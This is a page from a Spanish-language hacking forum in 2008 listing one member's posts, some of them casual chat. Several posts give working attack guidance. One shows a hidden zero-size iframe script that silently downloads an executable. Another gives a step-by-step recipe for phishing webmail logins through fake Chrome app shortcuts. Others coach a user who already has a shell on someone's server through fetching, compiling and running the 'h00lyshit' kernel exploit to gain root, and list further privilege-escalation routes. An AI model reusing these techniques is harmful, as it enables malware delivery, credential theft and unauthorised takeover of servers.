Perfil del miembro berz3k

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio

Ayuda

Ingresar

Registrarse

11 Octubre 2008, 01:46

Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 ... 25

61	Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32	en: 05 Septiembre 2008, 19:28
Este ultimo PoC "Save As" no me funciona, y ninguna calculadora o calc.exe se ejecuto, al solo me ocasiona el DoS y/o simplemente me cierra la app, esta raro el PoC -berz3k.

62	Forums Generales / Foro Libre / Re: 'Stars wars' ¿Ciencia o ficción?	en: 05 Septiembre 2008, 03:13
Una de las epocas que me encataria vivir es "Blade Runner" y un mas con "Nirvana" hackers entrando a satelites cyberpunk puro, William Gibson and Phillip key Dick r0x. -berz3k.

63	Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32	en: 05 Septiembre 2008, 03:00
@WHK En efecto, al pegar directamente en Chrome no pasa nada, pero el code funciona perfectamente, muy curioso.. -berz3k.

64	Forums Generales / Noticias / Re: ¿Una hacker se postula a vicepresidenta de los Estados Unidos?	en: 04 Septiembre 2008, 13:41
Hacker?, imaginen cuando se postule un TROLL o Script Kiddie a la presidencia? cuales serian sus prioridades, apoyar a st0ke de milw0rm.com y comprar 0days? XDDD -berz3k.

65	Forums Generales / Foro Libre / Re: Aprender ingles durmiendo?	en: 04 Septiembre 2008, 13:38
Napoleon lo usaba y la aplicaba a sus soldados, se llama Hipnopedia, , y como dice wiki no es realmente compribado. :http://es.wikipedia.org/wiki/Hipnopedia -berz3k.

66	Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32	en: 03 Septiembre 2008, 20:28
PD: Cambie el nombre del topic inicial, para mejorar el tema. -berz3k.

67	Seguridad Informática / Bugs y Exploits / Re: Bug en google chrome	en: 03 Septiembre 2008, 20:22
Browser Automatic File Download Exploit: Código: <script> document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); </script> Alguien mas? exploits diferentes a los posteados? hagamos una lista XD fuente: securiteam.com -berz3k.

68	Seguridad Informática / Bugs y Exploits / Re: Bug en google chrome	en: 03 Septiembre 2008, 16:39
Otro PoC en shortcuts de Win32 Have you installed the new Google chrome? Make sure you’re careful with your application shortcuts because I just thought of a very easy way to Phish basic users. Código: 1. Wrap the Chrome browser installation in your own InstallShield. 2. Create a Phising Mirror of Gmail or what ever site you want to Phish. 3. Add Desktop Shortcuts to the InstallShield which link to. "C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\Application\chrome.exe" --app=http://login.live..yourfakehotmailwebsite.com 4. Build your InstallShield. 5. Stick a graphic on your website that says “Get Google Chrome Now” and link to your InstallShield build. When the user install Google chrome from your link they'll get the browser but they will also find some helpful desktop links to their Hotmail/Gmail/Ebay account. As the Apps mode in Chrome loads in full screen with NO URL BAR (What were they thinking?). The user will happily click on the desktop links thinking it's just a handy shortcut that their friends at Google installed, not knowing it's really a link to our phishing mirror of Gmail. fuente :http://www.thewayithink.co.uk/post/Security-Vulnerability-with-Google-Chrome.aspx

69	Seguridad Informática / Bugs y Exploits / Re: Bug en google chrome	en: 03 Septiembre 2008, 16:34
:http://evilfingers.com/advisory/google_chrome_poc.php -berz3k.

70	Forums Generales / Foro Libre / Re: Owned	en: 03 Septiembre 2008, 16:15
Existen varios bugs aun no publicos sobre Chrome, alguno de ellos ya se publicaron en milw0rm.com, aun asi cabe destacar su magnifica rapidez para cargar y buscar paginas. -berz3k.

71	Seguridad Informática / Hacking Linux/Unix / Re: Escala de privilegios kernel 2.4.31	en: 30 Agosto 2008, 03:14
Entonces el server esta parchado, a menos que encotreis un 0day XDD, pero vaya, si ya intentaste todo y digo realmente todo, no hay nada que hacer. 1.Bugs locales busca files setuid y guid -4000 -2000, si encuentras algo interesante tendreis que hacerte tu propio exploit o intentatar infinidad de fuzzer para binarios en lunux. 2. Bugs locales en webapp, posiblemente algun procesos sea vulnerable al llamado de un CGI, PHP. Perl etc 3. Algun servicio vulnerable, scann de puertos observaras su servicios actuales. 4. Bugs Webapp, veo que ya tienes shell, observa algun config de Apache o IIS, version etc, el php o el mysql seguramente podras insertar algo para tener una shell con privilegios etc etc -berz3k. -berz3k.

72	Seguridad Informática / Hacking Linux/Unix / Re: Atacando la memoria desde Userland. Obteniendo passwords.	en: 29 Agosto 2008, 16:37
Aca esta lo que buscaba, revisar videos y tools, bastante buenas diria yo: :http://citp.princeton.edu/memory/code/ -berzk3.

73	Seguridad Informática / Hacking Linux/Unix / Re: Atacando la memoria desde Userland. Obteniendo passwords.	en: 29 Agosto 2008, 16:11
Habial leido algo del tema hace tiempo: :http://www.hermann-uwe.de/blog/how-to-dump-your-bios-password-and-lilo-password-as-plain-text Pero tambien me recuerdo un video donde dumpeaban la memoria RAM consiguiendo passwords y data de un win32, pero no le encuentro la linga , basicamente insertaban un USB o CDlive, dumpleando la RAM, modifcaban la data y entraban sin pass etc, si alguien lo tiene , que me lo postee. -berz3k.

74	Seguridad Informática / Hacking Linux/Unix / Re: Escala de privilegios kernel 2.4.31	en: 29 Agosto 2008, 15:37
Ha ya veo, el Data Cha0s es un simple SPAWN shell donde te permitira abrir un puerto y tener una shell normal, ejecutalo y cambiale el puerto de escucha, conectate a este nuevo puerto, busca un directorio "escribible" para que puedas poner uno de los tantos exploits para el kernel .eg. Buscando directorios "escribibles" Código: $find / -perm -2 -ls Generalmente el /tmp tiene permisos de escritura, ahora busca el codigo llamado "h00lyshit.c" por google o alguna de tantas paginas que lo hospeda y descargalo: Código: $ wget http://google/h00lyshit.c Compila el exploit Código: $gcc h00lyshit.c -o h00lyshit Ejecuta ahora el binario que te creeo: Código: $./h00lyshit /tmp/archivogrande Si todo marcha bien seras root, si no fue asi tendras que buscar mas vulnerabilidades LOCALES en el servidor para lograr el root o seguramente esta algo parchado. -berz3k.

75	Programación / Scripting / Re: mensajero por red con wbat	en: 29 Agosto 2008, 15:22
La page que posteas existen algunas tools interesantes para dejar de forma desatendida mediante barch algunos programs, muy buen link. -berz3k.

Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 ... 25

hard-h2o modding Foros de ayuda Yashira.org Videojuegos indetectables.net

Noticias Informatica Seguridad Informática ADSL Foros en español eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC